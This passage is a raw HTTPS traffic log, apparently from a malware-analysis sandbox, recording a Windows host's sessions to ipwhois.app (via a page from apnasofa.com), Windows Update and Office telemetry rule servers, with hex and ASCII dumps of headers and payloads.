                              Data Ascii: {"ip":"8.46.123.228"}


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              16192.168.2.449762103.126.138.874435324C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-11-29 14:58:39 UTC550OUTGET /json/8.46.123.228 HTTP/1.1
                              Host: ipwhois.app
                              Connection: keep-alive
                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                              sec-ch-ua-mobile: ?0
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              sec-ch-ua-platform: "Windows"
                              Accept: */*
                              Origin: https://apnasofa.com
                              Sec-Fetch-Site: cross-site
                              Sec-Fetch-Mode: cors
                              Sec-Fetch-Dest: empty
                              Referer: https://apnasofa.com/
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-11-29 14:58:39 UTC255INHTTP/1.1 200 OK
                              Date: Fri, 29 Nov 2024 14:58:39 GMT
                              Content-Type: application/json; charset=utf-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Server: ipwhois
                              Access-Control-Allow-Origin: *
                              Access-Control-Allow-Headers: *
                              X-Robots-Tag: noindex
                              2024-11-29 14:58:39 UTC69INData Raw: 33 61 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 66 61 6c 73 65 2c 22 6d 65 73 73 61 67 65 22 3a 22 79 6f 75 27 76 65 20 68 69 74 20 74 68 65 20 6d 6f 6e 74 68 6c 79 20 6c 69 6d 69 74 22 7d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 3a{"success":false,"message":"you've hit the monthly limit"}0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              17192.168.2.449763103.126.138.874435324C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-11-29 14:58:41 UTC352OUTGET /json/8.46.123.228 HTTP/1.1
                              Host: ipwhois.app
                              Connection: keep-alive
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              Accept: */*
                              Sec-Fetch-Site: none
                              Sec-Fetch-Mode: cors
                              Sec-Fetch-Dest: empty
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-11-29 14:58:42 UTC255INHTTP/1.1 200 OK
                              Date: Fri, 29 Nov 2024 14:58:42 GMT
                              Content-Type: application/json; charset=utf-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Server: ipwhois
                              Access-Control-Allow-Origin: *
                              Access-Control-Allow-Headers: *
                              X-Robots-Tag: noindex
                              2024-11-29 14:58:42 UTC699INData Raw: 32 61 66 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 32 32 38 22 2c 22 73 75 63 63 65 73 73 22 3a 74 72 75 65 2c 22 74 79 70 65 22 3a 22 49 50 76 34 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 22 3a 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 22 3a 22 4e 41 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 5f 66 6c 61 67 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 69 70 77 68 6f 69 73 2e 69 6f 5c 2f 66 6c 61 67 73 5c 2f 75 73 2e 73 76 67 22 2c 22 63 6f 75 6e 74 72 79 5f 63 61 70 69 74 61 6c 22 3a 22 57 61 73 68 69 6e 67 74 6f 6e 20 44 2e 43 2e 22 2c 22 63 6f 75 6e 74 72 79 5f 70 68
                              Data Ascii: 2af{"ip":"8.46.123.228","success":true,"type":"IPv4","continent":"North America","continent_code":"NA","country":"United States","country_code":"US","country_flag":"https:\/\/cdn.ipwhois.io\/flags\/us.svg","country_capital":"Washington D.C.","country_ph


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              18192.168.2.44976420.12.23.50443
                              TimestampBytes transferredDirectionData
                              2024-11-29 14:59:06 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=+MLZTbWPXAT4rRz&MD=6BwShcOh HTTP/1.1
                              Connection: Keep-Alive
                              Accept: */*
                              User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                              Host: slscr.update.microsoft.com
                              2024-11-29 14:59:07 UTC560INHTTP/1.1 200 OK
                              Cache-Control: no-cache
                              Pragma: no-cache
                              Content-Type: application/octet-stream
                              Expires: -1
                              Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                              ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                              MS-CorrelationId: 52ec8b0a-b5b2-45f3-a92d-c39ed7be1dfa
                              MS-RequestId: 7d86ad5b-d23a-4d24-8f29-e1c2c77b1c3d
                              MS-CV: 1shwzZBz/UOVgdUX.0
                              X-Microsoft-SLSClientCache: 1440
                              Content-Disposition: attachment; filename=environment.cab
                              X-Content-Type-Options: nosniff
                              Date: Fri, 29 Nov 2024 14:59:06 GMT
                              Connection: close
                              Content-Length: 30005
                              2024-11-29 14:59:07 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                              Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                              2024-11-29 14:59:07 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                              Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                              Session IDSource IPSource PortDestination IPDestination Port
                              19192.168.2.44976513.107.246.63443
                              TimestampBytes transferredDirectionData
                              2024-11-29 14:59:07 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                              Connection: Keep-Alive
                              Accept-Encoding: gzip
                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                              Host: otelrules.azureedge.net
                              2024-11-29 14:59:08 UTC471INHTTP/1.1 200 OK
                              Date: Fri, 29 Nov 2024 14:59:08 GMT
                              Content-Type: text/plain
                              Content-Length: 218853
                              Connection: close
                              Vary: Accept-Encoding
                              Cache-Control: public
                              Last-Modified: Wed, 27 Nov 2024 15:11:14 GMT
                              ETag: "0x8DD0EF5BC53602D"
                              x-ms-request-id: 6a1c01e7-101e-0046-0f00-4291b0000000
                              x-ms-version: 2018-03-28
                              x-azure-ref: 20241129T145908Z-174f7845968zgtf6hC1EWRqd8s0000000t3g000000003pba
                              x-fd-int-roxy-purgeid: 0
                              X-Cache: TCP_HIT
                              Accept-Ranges: bytes
                              2024-11-29 14:59:08 UTC15913INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                              Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                              2024-11-29 14:59:08 UTC16384INData Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20
                              Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
                              2024-11-29 14:59:08 UTC16384INData Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d
                              Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
                              2024-11-29 14:59:08 UTC16384INData Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20
                              Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
                              2024-11-29 14:59:08 UTC16384INData Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20
                              Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
                              2024-11-29 14:59:08 UTC16384INData Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e
                              Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
                              2024-11-29 14:59:08 UTC16384INData Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22
                              Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
                              2024-11-29 14:59:09 UTC16384INData Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43
                              Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
                              2024-11-29 14:59:09 UTC16384INData Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20
                              Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
                              2024-11-29 14:59:09 UTC16384INData Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20
                              Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>


                              Session IDSource IPSource PortDestination IPDestination Port
                              20192.168.2.44976813.107.246.63443
                              TimestampBytes transferredDirectionData
                              2024-11-29 14:59:10 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                              Connection: Keep-Alive
                              Accept-Encoding: gzip
                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                              Host: otelrules.azureedge.net
                              2024-11-29 14:59:11 UTC494INHTTP/1.1 200 OK
                              Date: Fri, 29 Nov 2024 14:59:11 GMT
                              Content-Type: text/xml
                              Content-Length: 2980
                              Connection: close
                              Vary: Accept-Encoding
                              Cache-Control: public, max-age=604800, immutable
                              Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                              ETag: "0x8DC582BA80D96A1"
                              x-ms-request-id: 2ca1f14f-f01e-001f-3f2a-405dc8000000
                              x-ms-version: 2018-03-28
                              x-azure-ref: 20241129T145911Z-174f7845968qj8jrhC1EWRh41s0000001040000000001dxk
                              x-fd-int-roxy-purgeid: 0
                              X-Cache: TCP_HIT
                              Accept-Ranges: bytes
                              2024-11-29 14:59:11 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                              Session IDSource IPSource PortDestination IPDestination Port
                              21192.168.2.44977013.107.246.63443
                              TimestampBytes transferredDirectionData
                              2024-11-29 14:59:10 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                              Connection: Keep-Alive
                              Accept-Encoding: gzip
                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                              Host: otelrules.azureedge.net
                              2024-11-29 14:59:11 UTC470INHTTP/1.1 200 OK
                              Date: Fri, 29 Nov 2024 14:59:11 GMT
                              Content-Type: text/xml
                              Content-Length: 408
                              Connection: close
                              Cache-Control: public, max-age=604800, immutable
                              Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                              ETag: "0x8DC582BB56D3AFB"
                              x-ms-request-id: dc0e4179-901e-005b-2991-3f2005000000
                              x-ms-version: 2018-03-28
                              x-azure-ref: 20241129T145911Z-174f7845968zgtf6hC1EWRqd8s0000000t1g000000009147
                              x-fd-int-roxy-purgeid: 0
                              X-Cache: TCP_HIT
                              Accept-Ranges: bytes
                              2024-11-29 14:59:11 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                              Session IDSource IPSource PortDestination IPDestination Port
                              22192.168.2.44976713.107.246.63443
                              TimestampBytes transferredDirectionData
                              2024-11-29 14:59:11 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                              Connection: Keep-Alive
                              Accept-Encoding: gzip
                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                              Host: otelrules.azureedge.net
                              2024-11-29 14:59:11 UTC470INHTTP/1.1 200 OK
                              Date: Fri, 29 Nov 2024 14:59:11 GMT
                              Content-Type: text/xml
